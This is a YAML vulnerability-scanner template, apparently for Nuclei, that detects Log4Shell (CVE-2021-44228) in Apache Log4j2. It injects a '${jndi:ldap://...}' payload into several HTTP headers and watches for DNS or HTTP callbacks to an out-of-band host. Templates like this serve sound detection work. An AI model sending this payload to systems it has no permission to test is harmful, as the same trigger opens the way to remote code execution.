id: cve-2021-44228-log4j

info:
  name: Apache Log4j RCE (Log4Shell)
  author: moon-gazing-tower
  severity: critical
  description: |
    Apache Log4j2 2.0-beta9 through 2.15.0 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints.
  tags: cve,cve2021,rce,log4j,apache
  classification:
    cve-id: CVE-2021-44228
    cwe-id: CWE-502
    cvss-score: 10.0
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-44228
    - https://logging.apache.org/log4j/2.x/security.html

variables:
  payload: "${jndi:ldap://{{interactsh-url}}}"

http:
  - method: GET
    path:
      - "{{BaseURL}}/"
    headers:
      X-Api-Version: "{{payload}}"
      User-Agent: "{{payload}}"
      Referer: "{{payload}}"
      X-Forwarded-For: "{{payload}}"
      Cookie: "session={{payload}}"

    matchers-condition: or
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-zA-Z0-9\.\-]+)\.oast\..*'
